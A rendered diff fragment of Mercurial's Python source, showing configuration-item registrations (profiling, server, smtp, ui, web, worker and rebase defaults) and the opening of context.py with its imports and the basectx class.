803 coreconfigitem('merge-tools', br'.*\.symlink$',
801 default=False,
804 default=False,
802 generic=True,
805 generic=True,
803 priority=-1,
806 priority=-1,
804 )
807 )
805 coreconfigitem('pager', 'attend-.*',
808 coreconfigitem('pager', 'attend-.*',
806 default=dynamicdefault,
809 default=dynamicdefault,
807 generic=True,
810 generic=True,
808 )
811 )
809 coreconfigitem('pager', 'ignore',
812 coreconfigitem('pager', 'ignore',
810 default=list,
813 default=list,
811 )
814 )
812 coreconfigitem('pager', 'pager',
815 coreconfigitem('pager', 'pager',
813 default=dynamicdefault,
816 default=dynamicdefault,
814 )
817 )
815 coreconfigitem('patch', 'eol',
818 coreconfigitem('patch', 'eol',
816 default='strict',
819 default='strict',
817 )
820 )
818 coreconfigitem('patch', 'fuzz',
821 coreconfigitem('patch', 'fuzz',
819 default=2,
822 default=2,
820 )
823 )
821 coreconfigitem('paths', 'default',
824 coreconfigitem('paths', 'default',
822 default=None,
825 default=None,
823 )
826 )
824 coreconfigitem('paths', 'default-push',
827 coreconfigitem('paths', 'default-push',
825 default=None,
828 default=None,
826 )
829 )
827 coreconfigitem('paths', '.*',
830 coreconfigitem('paths', '.*',
828 default=None,
831 default=None,
829 generic=True,
832 generic=True,
830 )
833 )
831 coreconfigitem('phases', 'checksubrepos',
834 coreconfigitem('phases', 'checksubrepos',
832 default='follow',
835 default='follow',
833 )
836 )
834 coreconfigitem('phases', 'new-commit',
837 coreconfigitem('phases', 'new-commit',
835 default='draft',
838 default='draft',
836 )
839 )
837 coreconfigitem('phases', 'publish',
840 coreconfigitem('phases', 'publish',
838 default=True,
841 default=True,
839 )
842 )
840 coreconfigitem('profiling', 'enabled',
843 coreconfigitem('profiling', 'enabled',
841 default=False,
844 default=False,
842 )
845 )
843 coreconfigitem('profiling', 'format',
846 coreconfigitem('profiling', 'format',
844 default='text',
847 default='text',
845 )
848 )
846 coreconfigitem('profiling', 'freq',
849 coreconfigitem('profiling', 'freq',
847 default=1000,
850 default=1000,
848 )
851 )
849 coreconfigitem('profiling', 'limit',
852 coreconfigitem('profiling', 'limit',
850 default=30,
853 default=30,
851 )
854 )
852 coreconfigitem('profiling', 'nested',
855 coreconfigitem('profiling', 'nested',
853 default=0,
856 default=0,
854 )
857 )
855 coreconfigitem('profiling', 'output',
858 coreconfigitem('profiling', 'output',
856 default=None,
859 default=None,
857 )
860 )
858 coreconfigitem('profiling', 'showmax',
861 coreconfigitem('profiling', 'showmax',
859 default=0.999,
862 default=0.999,
860 )
863 )
861 coreconfigitem('profiling', 'showmin',
864 coreconfigitem('profiling', 'showmin',
862 default=dynamicdefault,
865 default=dynamicdefault,
863 )
866 )
864 coreconfigitem('profiling', 'sort',
867 coreconfigitem('profiling', 'sort',
865 default='inlinetime',
868 default='inlinetime',
866 )
869 )
867 coreconfigitem('profiling', 'statformat',
870 coreconfigitem('profiling', 'statformat',
868 default='hotpath',
871 default='hotpath',
869 )
872 )
870 coreconfigitem('profiling', 'time-track',
873 coreconfigitem('profiling', 'time-track',
871 default='cpu',
874 default='cpu',
872 )
875 )
873 coreconfigitem('profiling', 'type',
876 coreconfigitem('profiling', 'type',
874 default='stat',
877 default='stat',
875 )
878 )
876 coreconfigitem('progress', 'assume-tty',
879 coreconfigitem('progress', 'assume-tty',
877 default=False,
880 default=False,
878 )
881 )
879 coreconfigitem('progress', 'changedelay',
882 coreconfigitem('progress', 'changedelay',
880 default=1,
883 default=1,
881 )
884 )
882 coreconfigitem('progress', 'clear-complete',
885 coreconfigitem('progress', 'clear-complete',
883 default=True,
886 default=True,
884 )
887 )
885 coreconfigitem('progress', 'debug',
888 coreconfigitem('progress', 'debug',
886 default=False,
889 default=False,
887 )
890 )
888 coreconfigitem('progress', 'delay',
891 coreconfigitem('progress', 'delay',
889 default=3,
892 default=3,
890 )
893 )
891 coreconfigitem('progress', 'disable',
894 coreconfigitem('progress', 'disable',
892 default=False,
895 default=False,
893 )
896 )
894 coreconfigitem('progress', 'estimateinterval',
897 coreconfigitem('progress', 'estimateinterval',
895 default=60.0,
898 default=60.0,
896 )
899 )
897 coreconfigitem('progress', 'format',
900 coreconfigitem('progress', 'format',
898 default=lambda: ['topic', 'bar', 'number', 'estimate'],
901 default=lambda: ['topic', 'bar', 'number', 'estimate'],
899 )
902 )
900 coreconfigitem('progress', 'refresh',
903 coreconfigitem('progress', 'refresh',
901 default=0.1,
904 default=0.1,
902 )
905 )
903 coreconfigitem('progress', 'width',
906 coreconfigitem('progress', 'width',
904 default=dynamicdefault,
907 default=dynamicdefault,
905 )
908 )
906 coreconfigitem('push', 'pushvars.server',
909 coreconfigitem('push', 'pushvars.server',
907 default=False,
910 default=False,
908 )
911 )
909 coreconfigitem('server', 'bookmarks-pushkey-compat',
912 coreconfigitem('server', 'bookmarks-pushkey-compat',
910 default=True,
913 default=True,
911 )
914 )
912 coreconfigitem('server', 'bundle1',
915 coreconfigitem('server', 'bundle1',
913 default=True,
916 default=True,
914 )
917 )
915 coreconfigitem('server', 'bundle1gd',
918 coreconfigitem('server', 'bundle1gd',
916 default=None,
919 default=None,
917 )
920 )
918 coreconfigitem('server', 'bundle1.pull',
921 coreconfigitem('server', 'bundle1.pull',
919 default=None,
922 default=None,
920 )
923 )
921 coreconfigitem('server', 'bundle1gd.pull',
924 coreconfigitem('server', 'bundle1gd.pull',
922 default=None,
925 default=None,
923 )
926 )
924 coreconfigitem('server', 'bundle1.push',
927 coreconfigitem('server', 'bundle1.push',
925 default=None,
928 default=None,
926 )
929 )
927 coreconfigitem('server', 'bundle1gd.push',
930 coreconfigitem('server', 'bundle1gd.push',
928 default=None,
931 default=None,
929 )
932 )
930 coreconfigitem('server', 'compressionengines',
933 coreconfigitem('server', 'compressionengines',
931 default=list,
934 default=list,
932 )
935 )
933 coreconfigitem('server', 'concurrent-push-mode',
936 coreconfigitem('server', 'concurrent-push-mode',
934 default='strict',
937 default='strict',
935 )
938 )
936 coreconfigitem('server', 'disablefullbundle',
939 coreconfigitem('server', 'disablefullbundle',
937 default=False,
940 default=False,
938 )
941 )
939 coreconfigitem('server', 'maxhttpheaderlen',
942 coreconfigitem('server', 'maxhttpheaderlen',
940 default=1024,
943 default=1024,
941 )
944 )
942 coreconfigitem('server', 'pullbundle',
945 coreconfigitem('server', 'pullbundle',
943 default=False,
946 default=False,
944 )
947 )
945 coreconfigitem('server', 'preferuncompressed',
948 coreconfigitem('server', 'preferuncompressed',
946 default=False,
949 default=False,
947 )
950 )
948 coreconfigitem('server', 'streamunbundle',
951 coreconfigitem('server', 'streamunbundle',
949 default=False,
952 default=False,
950 )
953 )
951 coreconfigitem('server', 'uncompressed',
954 coreconfigitem('server', 'uncompressed',
952 default=True,
955 default=True,
953 )
956 )
954 coreconfigitem('server', 'uncompressedallowsecret',
957 coreconfigitem('server', 'uncompressedallowsecret',
955 default=False,
958 default=False,
956 )
959 )
957 coreconfigitem('server', 'validate',
960 coreconfigitem('server', 'validate',
958 default=False,
961 default=False,
959 )
962 )
960 coreconfigitem('server', 'zliblevel',
963 coreconfigitem('server', 'zliblevel',
961 default=-1,
964 default=-1,
962 )
965 )
963 coreconfigitem('server', 'zstdlevel',
966 coreconfigitem('server', 'zstdlevel',
964 default=3,
967 default=3,
965 )
968 )
966 coreconfigitem('share', 'pool',
969 coreconfigitem('share', 'pool',
967 default=None,
970 default=None,
968 )
971 )
969 coreconfigitem('share', 'poolnaming',
972 coreconfigitem('share', 'poolnaming',
970 default='identity',
973 default='identity',
971 )
974 )
972 coreconfigitem('smtp', 'host',
975 coreconfigitem('smtp', 'host',
973 default=None,
976 default=None,
974 )
977 )
975 coreconfigitem('smtp', 'local_hostname',
978 coreconfigitem('smtp', 'local_hostname',
976 default=None,
979 default=None,
977 )
980 )
978 coreconfigitem('smtp', 'password',
981 coreconfigitem('smtp', 'password',
979 default=None,
982 default=None,
980 )
983 )
981 coreconfigitem('smtp', 'port',
984 coreconfigitem('smtp', 'port',
982 default=dynamicdefault,
985 default=dynamicdefault,
983 )
986 )
984 coreconfigitem('smtp', 'tls',
987 coreconfigitem('smtp', 'tls',
985 default='none',
988 default='none',
986 )
989 )
987 coreconfigitem('smtp', 'username',
990 coreconfigitem('smtp', 'username',
988 default=None,
991 default=None,
989 )
992 )
990 coreconfigitem('sparse', 'missingwarning',
993 coreconfigitem('sparse', 'missingwarning',
991 default=True,
994 default=True,
992 )
995 )
993 coreconfigitem('subrepos', 'allowed',
996 coreconfigitem('subrepos', 'allowed',
994 default=dynamicdefault, # to make backporting simpler
997 default=dynamicdefault, # to make backporting simpler
995 )
998 )
996 coreconfigitem('subrepos', 'hg:allowed',
999 coreconfigitem('subrepos', 'hg:allowed',
997 default=dynamicdefault,
1000 default=dynamicdefault,
998 )
1001 )
999 coreconfigitem('subrepos', 'git:allowed',
1002 coreconfigitem('subrepos', 'git:allowed',
1000 default=dynamicdefault,
1003 default=dynamicdefault,
1001 )
1004 )
1002 coreconfigitem('subrepos', 'svn:allowed',
1005 coreconfigitem('subrepos', 'svn:allowed',
1003 default=dynamicdefault,
1006 default=dynamicdefault,
1004 )
1007 )
1005 coreconfigitem('templates', '.*',
1008 coreconfigitem('templates', '.*',
1006 default=None,
1009 default=None,
1007 generic=True,
1010 generic=True,
1008 )
1011 )
1009 coreconfigitem('trusted', 'groups',
1012 coreconfigitem('trusted', 'groups',
1010 default=list,
1013 default=list,
1011 )
1014 )
1012 coreconfigitem('trusted', 'users',
1015 coreconfigitem('trusted', 'users',
1013 default=list,
1016 default=list,
1014 )
1017 )
1015 coreconfigitem('ui', '_usedassubrepo',
1018 coreconfigitem('ui', '_usedassubrepo',
1016 default=False,
1019 default=False,
1017 )
1020 )
1018 coreconfigitem('ui', 'allowemptycommit',
1021 coreconfigitem('ui', 'allowemptycommit',
1019 default=False,
1022 default=False,
1020 )
1023 )
1021 coreconfigitem('ui', 'archivemeta',
1024 coreconfigitem('ui', 'archivemeta',
1022 default=True,
1025 default=True,
1023 )
1026 )
1024 coreconfigitem('ui', 'askusername',
1027 coreconfigitem('ui', 'askusername',
1025 default=False,
1028 default=False,
1026 )
1029 )
1027 coreconfigitem('ui', 'clonebundlefallback',
1030 coreconfigitem('ui', 'clonebundlefallback',
1028 default=False,
1031 default=False,
1029 )
1032 )
1030 coreconfigitem('ui', 'clonebundleprefers',
1033 coreconfigitem('ui', 'clonebundleprefers',
1031 default=list,
1034 default=list,
1032 )
1035 )
1033 coreconfigitem('ui', 'clonebundles',
1036 coreconfigitem('ui', 'clonebundles',
1034 default=True,
1037 default=True,
1035 )
1038 )
1036 coreconfigitem('ui', 'color',
1039 coreconfigitem('ui', 'color',
1037 default='auto',
1040 default='auto',
1038 )
1041 )
1039 coreconfigitem('ui', 'commitsubrepos',
1042 coreconfigitem('ui', 'commitsubrepos',
1040 default=False,
1043 default=False,
1041 )
1044 )
1042 coreconfigitem('ui', 'debug',
1045 coreconfigitem('ui', 'debug',
1043 default=False,
1046 default=False,
1044 )
1047 )
1045 coreconfigitem('ui', 'debugger',
1048 coreconfigitem('ui', 'debugger',
1046 default=None,
1049 default=None,
1047 )
1050 )
1048 coreconfigitem('ui', 'editor',
1051 coreconfigitem('ui', 'editor',
1049 default=dynamicdefault,
1052 default=dynamicdefault,
1050 )
1053 )
1051 coreconfigitem('ui', 'fallbackencoding',
1054 coreconfigitem('ui', 'fallbackencoding',
1052 default=None,
1055 default=None,
1053 )
1056 )
1054 coreconfigitem('ui', 'forcecwd',
1057 coreconfigitem('ui', 'forcecwd',
1055 default=None,
1058 default=None,
1056 )
1059 )
1057 coreconfigitem('ui', 'forcemerge',
1060 coreconfigitem('ui', 'forcemerge',
1058 default=None,
1061 default=None,
1059 )
1062 )
1060 coreconfigitem('ui', 'formatdebug',
1063 coreconfigitem('ui', 'formatdebug',
1061 default=False,
1064 default=False,
1062 )
1065 )
1063 coreconfigitem('ui', 'formatjson',
1066 coreconfigitem('ui', 'formatjson',
1064 default=False,
1067 default=False,
1065 )
1068 )
1066 coreconfigitem('ui', 'formatted',
1069 coreconfigitem('ui', 'formatted',
1067 default=None,
1070 default=None,
1068 )
1071 )
1069 coreconfigitem('ui', 'graphnodetemplate',
1072 coreconfigitem('ui', 'graphnodetemplate',
1070 default=None,
1073 default=None,
1071 )
1074 )
1072 coreconfigitem('ui', 'interactive',
1075 coreconfigitem('ui', 'interactive',
1073 default=None,
1076 default=None,
1074 )
1077 )
1075 coreconfigitem('ui', 'interface',
1078 coreconfigitem('ui', 'interface',
1076 default=None,
1079 default=None,
1077 )
1080 )
1078 coreconfigitem('ui', 'interface.chunkselector',
1081 coreconfigitem('ui', 'interface.chunkselector',
1079 default=None,
1082 default=None,
1080 )
1083 )
1081 coreconfigitem('ui', 'logblockedtimes',
1084 coreconfigitem('ui', 'logblockedtimes',
1082 default=False,
1085 default=False,
1083 )
1086 )
1084 coreconfigitem('ui', 'logtemplate',
1087 coreconfigitem('ui', 'logtemplate',
1085 default=None,
1088 default=None,
1086 )
1089 )
1087 coreconfigitem('ui', 'merge',
1090 coreconfigitem('ui', 'merge',
1088 default=None,
1091 default=None,
1089 )
1092 )
1090 coreconfigitem('ui', 'mergemarkers',
1093 coreconfigitem('ui', 'mergemarkers',
1091 default='basic',
1094 default='basic',
1092 )
1095 )
1093 coreconfigitem('ui', 'mergemarkertemplate',
1096 coreconfigitem('ui', 'mergemarkertemplate',
1094 default=('{node|short} '
1097 default=('{node|short} '
1095 '{ifeq(tags, "tip", "", '
1098 '{ifeq(tags, "tip", "", '
1096 'ifeq(tags, "", "", "{tags} "))}'
1099 'ifeq(tags, "", "", "{tags} "))}'
1097 '{if(bookmarks, "{bookmarks} ")}'
1100 '{if(bookmarks, "{bookmarks} ")}'
1098 '{ifeq(branch, "default", "", "{branch} ")}'
1101 '{ifeq(branch, "default", "", "{branch} ")}'
1099 '- {author|user}: {desc|firstline}')
1102 '- {author|user}: {desc|firstline}')
1100 )
1103 )
1101 coreconfigitem('ui', 'nontty',
1104 coreconfigitem('ui', 'nontty',
1102 default=False,
1105 default=False,
1103 )
1106 )
1104 coreconfigitem('ui', 'origbackuppath',
1107 coreconfigitem('ui', 'origbackuppath',
1105 default=None,
1108 default=None,
1106 )
1109 )
1107 coreconfigitem('ui', 'paginate',
1110 coreconfigitem('ui', 'paginate',
1108 default=True,
1111 default=True,
1109 )
1112 )
1110 coreconfigitem('ui', 'patch',
1113 coreconfigitem('ui', 'patch',
1111 default=None,
1114 default=None,
1112 )
1115 )
1113 coreconfigitem('ui', 'portablefilenames',
1116 coreconfigitem('ui', 'portablefilenames',
1114 default='warn',
1117 default='warn',
1115 )
1118 )
1116 coreconfigitem('ui', 'promptecho',
1119 coreconfigitem('ui', 'promptecho',
1117 default=False,
1120 default=False,
1118 )
1121 )
1119 coreconfigitem('ui', 'quiet',
1122 coreconfigitem('ui', 'quiet',
1120 default=False,
1123 default=False,
1121 )
1124 )
1122 coreconfigitem('ui', 'quietbookmarkmove',
1125 coreconfigitem('ui', 'quietbookmarkmove',
1123 default=False,
1126 default=False,
1124 )
1127 )
1125 coreconfigitem('ui', 'remotecmd',
1128 coreconfigitem('ui', 'remotecmd',
1126 default='hg',
1129 default='hg',
1127 )
1130 )
1128 coreconfigitem('ui', 'report_untrusted',
1131 coreconfigitem('ui', 'report_untrusted',
1129 default=True,
1132 default=True,
1130 )
1133 )
1131 coreconfigitem('ui', 'rollback',
1134 coreconfigitem('ui', 'rollback',
1132 default=True,
1135 default=True,
1133 )
1136 )
1134 coreconfigitem('ui', 'signal-safe-lock',
1137 coreconfigitem('ui', 'signal-safe-lock',
1135 default=True,
1138 default=True,
1136 )
1139 )
1137 coreconfigitem('ui', 'slash',
1140 coreconfigitem('ui', 'slash',
1138 default=False,
1141 default=False,
1139 )
1142 )
1140 coreconfigitem('ui', 'ssh',
1143 coreconfigitem('ui', 'ssh',
1141 default='ssh',
1144 default='ssh',
1142 )
1145 )
1143 coreconfigitem('ui', 'ssherrorhint',
1146 coreconfigitem('ui', 'ssherrorhint',
1144 default=None,
1147 default=None,
1145 )
1148 )
1146 coreconfigitem('ui', 'statuscopies',
1149 coreconfigitem('ui', 'statuscopies',
1147 default=False,
1150 default=False,
1148 )
1151 )
1149 coreconfigitem('ui', 'strict',
1152 coreconfigitem('ui', 'strict',
1150 default=False,
1153 default=False,
1151 )
1154 )
1152 coreconfigitem('ui', 'style',
1155 coreconfigitem('ui', 'style',
1153 default='',
1156 default='',
1154 )
1157 )
1155 coreconfigitem('ui', 'supportcontact',
1158 coreconfigitem('ui', 'supportcontact',
1156 default=None,
1159 default=None,
1157 )
1160 )
1158 coreconfigitem('ui', 'textwidth',
1161 coreconfigitem('ui', 'textwidth',
1159 default=78,
1162 default=78,
1160 )
1163 )
1161 coreconfigitem('ui', 'timeout',
1164 coreconfigitem('ui', 'timeout',
1162 default='600',
1165 default='600',
1163 )
1166 )
1164 coreconfigitem('ui', 'timeout.warn',
1167 coreconfigitem('ui', 'timeout.warn',
1165 default=0,
1168 default=0,
1166 )
1169 )
1167 coreconfigitem('ui', 'traceback',
1170 coreconfigitem('ui', 'traceback',
1168 default=False,
1171 default=False,
1169 )
1172 )
1170 coreconfigitem('ui', 'tweakdefaults',
1173 coreconfigitem('ui', 'tweakdefaults',
1171 default=False,
1174 default=False,
1172 )
1175 )
1173 coreconfigitem('ui', 'username',
1176 coreconfigitem('ui', 'username',
1174 alias=[('ui', 'user')]
1177 alias=[('ui', 'user')]
1175 )
1178 )
1176 coreconfigitem('ui', 'verbose',
1179 coreconfigitem('ui', 'verbose',
1177 default=False,
1180 default=False,
1178 )
1181 )
1179 coreconfigitem('verify', 'skipflags',
1182 coreconfigitem('verify', 'skipflags',
1180 default=None,
1183 default=None,
1181 )
1184 )
1182 coreconfigitem('web', 'allowbz2',
1185 coreconfigitem('web', 'allowbz2',
1183 default=False,
1186 default=False,
1184 )
1187 )
1185 coreconfigitem('web', 'allowgz',
1188 coreconfigitem('web', 'allowgz',
1186 default=False,
1189 default=False,
1187 )
1190 )
1188 coreconfigitem('web', 'allow-pull',
1191 coreconfigitem('web', 'allow-pull',
1189 alias=[('web', 'allowpull')],
1192 alias=[('web', 'allowpull')],
1190 default=True,
1193 default=True,
1191 )
1194 )
1192 coreconfigitem('web', 'allow-push',
1195 coreconfigitem('web', 'allow-push',
1193 alias=[('web', 'allow_push')],
1196 alias=[('web', 'allow_push')],
1194 default=list,
1197 default=list,
1195 )
1198 )
1196 coreconfigitem('web', 'allowzip',
1199 coreconfigitem('web', 'allowzip',
1197 default=False,
1200 default=False,
1198 )
1201 )
1199 coreconfigitem('web', 'archivesubrepos',
1202 coreconfigitem('web', 'archivesubrepos',
1200 default=False,
1203 default=False,
1201 )
1204 )
1202 coreconfigitem('web', 'cache',
1205 coreconfigitem('web', 'cache',
1203 default=True,
1206 default=True,
1204 )
1207 )
1205 coreconfigitem('web', 'contact',
1208 coreconfigitem('web', 'contact',
1206 default=None,
1209 default=None,
1207 )
1210 )
1208 coreconfigitem('web', 'deny_push',
1211 coreconfigitem('web', 'deny_push',
1209 default=list,
1212 default=list,
1210 )
1213 )
1211 coreconfigitem('web', 'guessmime',
1214 coreconfigitem('web', 'guessmime',
1212 default=False,
1215 default=False,
1213 )
1216 )
1214 coreconfigitem('web', 'hidden',
1217 coreconfigitem('web', 'hidden',
1215 default=False,
1218 default=False,
1216 )
1219 )
1217 coreconfigitem('web', 'labels',
1220 coreconfigitem('web', 'labels',
1218 default=list,
1221 default=list,
1219 )
1222 )
1220 coreconfigitem('web', 'logoimg',
1223 coreconfigitem('web', 'logoimg',
1221 default='hglogo.png',
1224 default='hglogo.png',
1222 )
1225 )
1223 coreconfigitem('web', 'logourl',
1226 coreconfigitem('web', 'logourl',
1224 default='https://mercurial-scm.org/',
1227 default='https://mercurial-scm.org/',
1225 )
1228 )
1226 coreconfigitem('web', 'accesslog',
1229 coreconfigitem('web', 'accesslog',
1227 default='-',
1230 default='-',
1228 )
1231 )
1229 coreconfigitem('web', 'address',
1232 coreconfigitem('web', 'address',
1230 default='',
1233 default='',
1231 )
1234 )
1232 coreconfigitem('web', 'allow-archive',
1235 coreconfigitem('web', 'allow-archive',
1233 alias=[('web', 'allow_archive')],
1236 alias=[('web', 'allow_archive')],
1234 default=list,
1237 default=list,
1235 )
1238 )
1236 coreconfigitem('web', 'allow_read',
1239 coreconfigitem('web', 'allow_read',
1237 default=list,
1240 default=list,
1238 )
1241 )
1239 coreconfigitem('web', 'baseurl',
1242 coreconfigitem('web', 'baseurl',
1240 default=None,
1243 default=None,
1241 )
1244 )
1242 coreconfigitem('web', 'cacerts',
1245 coreconfigitem('web', 'cacerts',
1243 default=None,
1246 default=None,
1244 )
1247 )
1245 coreconfigitem('web', 'certificate',
1248 coreconfigitem('web', 'certificate',
1246 default=None,
1249 default=None,
1247 )
1250 )
1248 coreconfigitem('web', 'collapse',
1251 coreconfigitem('web', 'collapse',
1249 default=False,
1252 default=False,
1250 )
1253 )
1251 coreconfigitem('web', 'csp',
1254 coreconfigitem('web', 'csp',
1252 default=None,
1255 default=None,
1253 )
1256 )
1254 coreconfigitem('web', 'deny_read',
1257 coreconfigitem('web', 'deny_read',
1255 default=list,
1258 default=list,
1256 )
1259 )
1257 coreconfigitem('web', 'descend',
1260 coreconfigitem('web', 'descend',
1258 default=True,
1261 default=True,
1259 )
1262 )
1260 coreconfigitem('web', 'description',
1263 coreconfigitem('web', 'description',
1261 default="",
1264 default="",
1262 )
1265 )
1263 coreconfigitem('web', 'encoding',
1266 coreconfigitem('web', 'encoding',
1264 default=lambda: encoding.encoding,
1267 default=lambda: encoding.encoding,
1265 )
1268 )
1266 coreconfigitem('web', 'errorlog',
1269 coreconfigitem('web', 'errorlog',
1267 default='-',
1270 default='-',
1268 )
1271 )
1269 coreconfigitem('web', 'ipv6',
1272 coreconfigitem('web', 'ipv6',
1270 default=False,
1273 default=False,
1271 )
1274 )
1272 coreconfigitem('web', 'maxchanges',
1275 coreconfigitem('web', 'maxchanges',
1273 default=10,
1276 default=10,
1274 )
1277 )
1275 coreconfigitem('web', 'maxfiles',
1278 coreconfigitem('web', 'maxfiles',
1276 default=10,
1279 default=10,
1277 )
1280 )
1278 coreconfigitem('web', 'maxshortchanges',
1281 coreconfigitem('web', 'maxshortchanges',
1279 default=60,
1282 default=60,
1280 )
1283 )
1281 coreconfigitem('web', 'motd',
1284 coreconfigitem('web', 'motd',
1282 default='',
1285 default='',
1283 )
1286 )
1284 coreconfigitem('web', 'name',
1287 coreconfigitem('web', 'name',
1285 default=dynamicdefault,
1288 default=dynamicdefault,
1286 )
1289 )
1287 coreconfigitem('web', 'port',
1290 coreconfigitem('web', 'port',
1288 default=8000,
1291 default=8000,
1289 )
1292 )
1290 coreconfigitem('web', 'prefix',
1293 coreconfigitem('web', 'prefix',
1291 default='',
1294 default='',
1292 )
1295 )
1293 coreconfigitem('web', 'push_ssl',
1296 coreconfigitem('web', 'push_ssl',
1294 default=True,
1297 default=True,
1295 )
1298 )
1296 coreconfigitem('web', 'refreshinterval',
1299 coreconfigitem('web', 'refreshinterval',
1297 default=20,
1300 default=20,
1298 )
1301 )
1299 coreconfigitem('web', 'server-header',
1302 coreconfigitem('web', 'server-header',
1300 default=None,
1303 default=None,
1301 )
1304 )
1302 coreconfigitem('web', 'staticurl',
1305 coreconfigitem('web', 'staticurl',
1303 default=None,
1306 default=None,
1304 )
1307 )
1305 coreconfigitem('web', 'stripes',
1308 coreconfigitem('web', 'stripes',
1306 default=1,
1309 default=1,
1307 )
1310 )
1308 coreconfigitem('web', 'style',
1311 coreconfigitem('web', 'style',
1309 default='paper',
1312 default='paper',
1310 )
1313 )
1311 coreconfigitem('web', 'templates',
1314 coreconfigitem('web', 'templates',
1312 default=None,
1315 default=None,
1313 )
1316 )
1314 coreconfigitem('web', 'view',
1317 coreconfigitem('web', 'view',
1315 default='served',
1318 default='served',
1316 )
1319 )
1317 coreconfigitem('worker', 'backgroundclose',
1320 coreconfigitem('worker', 'backgroundclose',
1318 default=dynamicdefault,
1321 default=dynamicdefault,
1319 )
1322 )
1320 # Windows defaults to a limit of 512 open files. A buffer of 128
1323 # Windows defaults to a limit of 512 open files. A buffer of 128
1321 # should give us enough headway.
1324 # should give us enough headway.
1322 coreconfigitem('worker', 'backgroundclosemaxqueue',
1325 coreconfigitem('worker', 'backgroundclosemaxqueue',
1323 default=384,
1326 default=384,
1324 )
1327 )
1325 coreconfigitem('worker', 'backgroundcloseminfilecount',
1328 coreconfigitem('worker', 'backgroundcloseminfilecount',
1326 default=2048,
1329 default=2048,
1327 )
1330 )
1328 coreconfigitem('worker', 'backgroundclosethreadcount',
1331 coreconfigitem('worker', 'backgroundclosethreadcount',
1329 default=4,
1332 default=4,
1330 )
1333 )
1331 coreconfigitem('worker', 'enabled',
1334 coreconfigitem('worker', 'enabled',
1332 default=True,
1335 default=True,
1333 )
1336 )
1334 coreconfigitem('worker', 'numcpus',
1337 coreconfigitem('worker', 'numcpus',
1335 default=None,
1338 default=None,
1336 )
1339 )
1337
1340
1338 # Rebase related configuration moved to core because other extension are doing
1341 # Rebase related configuration moved to core because other extension are doing
1339 # strange things. For example, shelve import the extensions to reuse some bit
1342 # strange things. For example, shelve import the extensions to reuse some bit
1340 # without formally loading it.
1343 # without formally loading it.
1341 coreconfigitem('commands', 'rebase.requiredest',
1344 coreconfigitem('commands', 'rebase.requiredest',
1342 default=False,
1345 default=False,
1343 )
1346 )
1344 coreconfigitem('experimental', 'rebaseskipobsolete',
1347 coreconfigitem('experimental', 'rebaseskipobsolete',
1345 default=True,
1348 default=True,
1346 )
1349 )
1347 coreconfigitem('rebase', 'singletransaction',
1350 coreconfigitem('rebase', 'singletransaction',
1348 default=False,
1351 default=False,
1349 )
1352 )
1350 coreconfigitem('rebase', 'experimental.inmemory',
1353 coreconfigitem('rebase', 'experimental.inmemory',
1351 default=False,
1354 default=False,
1352 )
1355 )
@@ -1,2534 +1,2536 b''
1 # context.py - changeset and file context objects for mercurial
1 # context.py - changeset and file context objects for mercurial
2 #
2 #
3 # Copyright 2006, 2007 Matt Mackall <mpm@selenic.com>
3 # Copyright 2006, 2007 Matt Mackall <mpm@selenic.com>
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7
7
8 from __future__ import absolute_import
8 from __future__ import absolute_import
9
9
10 import errno
10 import errno
11 import filecmp
11 import filecmp
12 import os
12 import os
13 import stat
13 import stat
14
14
15 from .i18n import _
15 from .i18n import _
16 from .node import (
16 from .node import (
17 addednodeid,
17 addednodeid,
18 bin,
18 bin,
19 hex,
19 hex,
20 modifiednodeid,
20 modifiednodeid,
21 nullid,
21 nullid,
22 nullrev,
22 nullrev,
23 short,
23 short,
24 wdirfilenodeids,
24 wdirfilenodeids,
25 wdirid,
25 wdirid,
26 )
26 )
27 from . import (
27 from . import (
28 dagop,
28 dagop,
29 encoding,
29 encoding,
30 error,
30 error,
31 fileset,
31 fileset,
32 match as matchmod,
32 match as matchmod,
33 obsolete as obsmod,
33 obsolete as obsmod,
34 patch,
34 patch,
35 pathutil,
35 pathutil,
36 phases,
36 phases,
37 pycompat,
37 pycompat,
38 repoview,
38 repoview,
39 revlog,
39 revlog,
40 scmutil,
40 scmutil,
41 sparse,
41 sparse,
42 subrepo,
42 subrepo,
43 subrepoutil,
43 subrepoutil,
44 util,
44 util,
45 )
45 )
46 from .utils import (
46 from .utils import (
47 dateutil,
47 dateutil,
48 stringutil,
48 stringutil,
49 )
49 )
50
50
51 propertycache = util.propertycache
51 propertycache = util.propertycache
52
52
53 class basectx(object):
53 class basectx(object):
54 """A basectx object represents the common logic for its children:
54 """A basectx object represents the common logic for its children:
55 changectx: read-only context that is already present in the repo,
55 changectx: read-only context that is already present in the repo,
56 workingctx: a context that represents the working directory and can
56 workingctx: a context that represents the working directory and can
57 be committed,
57 be committed,
58 memctx: a context that represents changes in-memory and can also
58 memctx: a context that represents changes in-memory and can also
59 be committed."""
59 be committed."""
60
60
61 def __init__(self, repo):
61 def __init__(self, repo):
62 self._repo = repo
62 self._repo = repo
63
63
64 def __bytes__(self):
64 def __bytes__(self):
65 return short(self.node())
65 return short(self.node())
66
66
67 __str__ = encoding.strmethod(__bytes__)
67 __str__ = encoding.strmethod(__bytes__)
68
68
69 def __repr__(self):
69 def __repr__(self):
70 return r"<%s %s>" % (type(self).__name__, str(self))
70 return r"<%s %s>" % (type(self).__name__, str(self))
71
71
72 def __eq__(self, other):
72 def __eq__(self, other):
73 try:
73 try:
74 return type(self) == type(other) and self._rev == other._rev
74 return type(self) == type(other) and self._rev == other._rev
75 except AttributeError:
75 except AttributeError:
76 return False
76 return False
77
77
78 def __ne__(self, other):
78 def __ne__(self, other):
79 return not (self == other)
79 return not (self == other)
80
80
81 def __contains__(self, key):
81 def __contains__(self, key):
82 return key in self._manifest
82 return key in self._manifest
83
83
84 def __getitem__(self, key):
84 def __getitem__(self, key):
85 return self.filectx(key)
85 return self.filectx(key)
86
86
87 def __iter__(self):
87 def __iter__(self):
88 return iter(self._manifest)
88 return iter(self._manifest)
89
89
90 def _buildstatusmanifest(self, status):
90 def _buildstatusmanifest(self, status):
91 """Builds a manifest that includes the given status results, if this is
91 """Builds a manifest that includes the given status results, if this is
92 a working copy context. For non-working copy contexts, it just returns
92 a working copy context. For non-working copy contexts, it just returns
93 the normal manifest."""
93 the normal manifest."""
94 return self.manifest()
94 return self.manifest()
95
95
96 def _matchstatus(self, other, match):
96 def _matchstatus(self, other, match):
97 """This internal method provides a way for child objects to override the
97 """This internal method provides a way for child objects to override the
98 match operator.
98 match operator.
99 """
99 """
100 return match
